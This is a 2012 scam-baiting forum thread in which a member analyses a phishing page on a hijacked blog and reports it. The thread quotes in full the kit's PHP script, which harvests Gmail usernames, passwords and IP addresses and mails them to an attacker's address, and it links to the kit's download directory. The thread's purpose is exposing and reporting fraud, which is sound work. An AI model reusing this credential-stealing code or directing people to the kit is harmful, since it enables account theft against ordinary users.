Author |
Message |
zzz
Master Baiter
Joined: 14 Jun 2012
Posts: 101
Location: England
|
Posted:
Wed Jun 27, 2012 9:29 am |
|
If you open www.jasonsamuel.com only it seems to be a normal blog. However the link I received in a scam email opens a page, saying:
Quote: |
To access our online secured auction page,
you are required to choose your email address below |
Here is the link:
http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm
It is safe to open it, it asks you to select an email provider, so after clicking the relevant icon a small form appears prompting for email and password.
This is 100% fake and the purpose is to collect email/password information from innocent victims.
I made a quick analysis and was able to download a ZIP file, containing the files hosted behind the malicious link. There are PHP (server-side) files, executed when the user clicks the "Sign in" button. Here is the contents of one of the PHP files:
Quote: |
<?include 'index_files/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "---------------- XxX *~* HollYd*~* XxX----------------------\n";
$message .= "Gmail: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "----------------------------------Created By HollyD--------------------------------------\n";
$recipient = "[email protected]";
$subject = "Gma!l REZ";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: http://www.remax.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?> |
I can clearly see this code is constructing a message, containing the email and password entered by the victim, also the client IP address and some other stupid lines ("Created By HollyD"). Then this message is sent to the following address:
[email protected]
If anybody else wants to take a look, open the following link (it is safe):
http://www.jasonsamuel.com/fitness/properties/
It will open a directory contents, download the properties.zip file. The code listed above I extracted from gmail.php - the other php files in fact perform exactly the same thing - sending victim's email and password to this same email address:
[email protected]
What should be the course of action? |
_________________ x4 x 14
"Idiot you are such a moron, article of no commercial value uncircumcised baboon, moron of a frog"
"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"
"You email has been received and from my understanding your email is not well understood." |
|
|
|
B8er
Associate Boomdazzler
Joined: 16 Feb 2009
Posts: 13625
Location: In self-isolation practicing social distancing
|
Posted:
Wed Jun 27, 2012 10:57 am |
|
It's a phishing site, which we don't deal with here.
The best thing to do would be to report it to one (or more) of the email providers using their report phishing links - give them the http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm page so that they can see it is phishing for email passwords.
They will soon get it closed down. |
_________________ "I DENOUNCE THE MUFFIN MEN" - Ma Kim
"YOU ARE WALKING DEAD MAN. YOUR WOODEN COFFIN IS READY TO SWALLOW YOU AND YOUR DIRTY GENERATION"
"all chaps are ass-less by design otherwise they just be leather pants" - jose_cuervo
x 5
x 335 🚽
x 4 x 1746 x 1904 - Fake cheques: $4,392,620.83
Team Woody - Ghana to Singapore - 11535km |
|
|
|
zzz
Master Baiter
Joined: 14 Jun 2012
Posts: 101
Location: England
|
Posted:
Wed Jun 27, 2012 11:07 am |
|
^^^ Reported to Google.
Can a mod close this thread please? |
_________________ x4 x 14
"Idiot you are such a moron, article of no commercial value uncircumcised baboon, moron of a frog"
"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"
"You email has been received and from my understanding your email is not well understood." |
|
|
|
woody999
Baiting Guru
Joined: 30 May 2009
Posts: 20608
Location: East of Humptulips
|
Posted:
Wed Jun 27, 2012 1:02 pm |
|
Marking as n/a and can be moved offline |
_________________ "thank you for making me a fool" CC lad
"I lost my assories" Barr. Angus Bu...g
"YOU NEED SOME DOCTOR" Barrister Peter Paul
I dont know who is lieing ,either you or F3lcha1r
is annoying to watch my email for a whole day and not read from you-
>178 x 200 x2
Peru : sri lanka : USVI : Oman x 5816
x 45 x2 |
|
|
|
|
|
View next topic
View previous topic
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
|